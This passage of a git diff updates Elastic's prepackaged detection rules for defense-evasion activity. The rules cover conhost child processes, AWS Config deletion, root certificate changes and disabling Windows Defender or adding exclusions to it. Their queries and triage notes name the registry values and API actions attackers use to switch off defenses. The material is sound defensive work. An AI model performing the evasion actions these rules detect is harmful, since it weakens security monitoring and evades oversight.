"keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f772ec8a-e182-483c-91d2-72058f76a44c", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json index de61101b8699f..2cd4074bfb1f5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_code_injection_conhost.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process from Conhost", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process from Conhost\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nThe `conhost.exe` process doesn't normally have child processes. Any processes spawned by the `conhost.exe` process can indicate code\ninjection activity or a suspicious process masquerading as the `conhost.exe` process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### Related rules\n\n- Conhost Spawned By Suspicious Parent Process - 05b358de-aa6d-4f6c-89e6-78f74018b43b\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process from Conhost\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nThe `conhost.exe` process doesn't normally have child processes. Any processes spawned by the `conhost.exe` process can indicate code\ninjection activity or a suspicious process masquerading as the `conhost.exe` process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### Related rules\n\n- Conhost Spawned By Suspicious Parent Process - 05b358de-aa6d-4f6c-89e6-78f74018b43b\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"conhost.exe\" and\n not process.executable : (\"?:\\\\Windows\\\\splwow64.exe\", \"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\conhost.exe\")\n", "references": [ "https://modexp.wordpress.com/2018/09/12/process-injection-user-data/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Defense%20Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "28896382-7d4f-4d50-9b72-67091901fd26", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json index f58164d1a483f..96e5106738636 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_config_service_rule_deletion.json @@ -15,16 +15,41 @@ "interval": "10m", "language": "kuery", "license": "Elastic License v2", - "name": "AWS Config Service Tampering", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "name": "AWS Config Resource Deletion", + "note": "## Triage and analysis\n\n### Investigating AWS Config Resource Deletion\n\nAWS Config provides a detailed view of the configuration of AWS resources in your AWS account. This includes how the\nresources are related to one another and how they were configured in the past so that you can see how the configurations\nand relationships change over time.\n\nThis rule looks for the deletion of AWS Config resources using various API actions. Attackers can do this to cover their\ntracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the AWS resource that was involved and its criticality, ownership, and role in the environment. Also investigate\nif the resource is security-related.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:config.amazonaws.com and\n event.action:(DeleteConfigRule or DeleteOrganizationConfigRule or DeleteConfigurationAggregator or\n DeleteConfigurationRecorder or DeleteConformancePack or DeleteOrganizationConformancePack or\n DeleteDeliveryChannel or DeleteRemediationConfiguration or DeleteRetentionConfiguration)\n", "references": [ "https://docs.aws.amazon.com/config/latest/developerguide/how-does-config-work.html", "https://docs.aws.amazon.com/config/latest/APIReference/API_Operations.html" ], - "risk_score": 47, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, "rule_id": "7024e2a0-315d-4334-bb1a-552d604f27bc", - "severity": "medium", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", "tags": [ "Elastic", "Cloud", @@ -59,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json index c222b25721292..f4463a966f553 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_configuration_recorder_stopped.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Configuration Recorder Stopped", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:config.amazonaws.com and event.action:StopConfigurationRecorder and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/configservice/stop-configuration-recorder.html", "https://docs.aws.amazon.com/config/latest/APIReference/API_StopConfigurationRecorder.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "fbd44836-0d69-4004-a0b4-03c20370c435", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json index 89cadc166debf..124629ec51b20 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_create_mod_root_certificate.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (e.g. Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", "false_positives": [ "Certain applications may install root certificates for the purpose of inspecting SSL traffic." ], @@ -15,14 +15,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation or Modification of Root Certificate", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and\nlegitimate. This verification is based upon the identification of a certification authority. Windows\nadds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The\ninstallation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid\nsigned components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, other registry or file\nmodifications, and any spawned child processes.\n- If one of the processes is suspicious, retrieve it and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting\nSSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path :\n (\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\\\\Blob\",\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\*\\\\Blob\"\n )\n", "references": [ "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://www.ired.team/offensive-security/persistence/t1130-install-root-certificate" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json index fba792e80d490..0d6241fff2814 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cve_2020_0601.json @@ -11,6 +11,18 @@ "license": "Elastic License v2", "name": "Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)", "query": "event.provider:\"Microsoft-Windows-Audit-CVE\" and message:\"[CVE-2020-0601]\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + } + ], "risk_score": 21, "rule_id": "56557cde-d923-4b88-adee-c61b3f3b5dc3", "severity": "low", @@ -47,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json index 7674d0a4db706..f8b76e6437de9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_disabled_via_registry.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Defender Disabled via Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n (\n (\n registry.path:\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path:\"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\" and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n )\n", "references": [ "https://thedfirreport.com/2020/12/13/defender-control/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json index 3ea80655c3559..f8dfedb11c29b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_defender_exclusion_via_powershell.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Defender Exclusions Added via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is\nused to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration\nsettings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of\nthe more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/)\nwas observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection. \n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or path, retrieve the file(s) and determine if malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives due to how often network administrators legitimately configure\nexclusions. In order to validate the activity further, review the specific exclusion and its intent. There are many\nlegitimate reasons for exclusions, so it's important to gain context.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Exclusion lists for antimalware capabilities should always be routinely monitored for review.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Exclusions Added via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows. Since this software product is\nused to prevent and stop malware, it's important to monitor what specific exclusions are made to the product's configuration\nsettings. These can often be signs of an adversary or malware trying to bypass Windows Defender's capabilities. One of\nthe more notable [examples](https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/)\nwas observed in 2018 where Trickbot incorporated mechanisms to disable Windows Defender to avoid detection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the exclusion in order to determine the intent behind it.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- If the exclusion specifies a suspicious file or 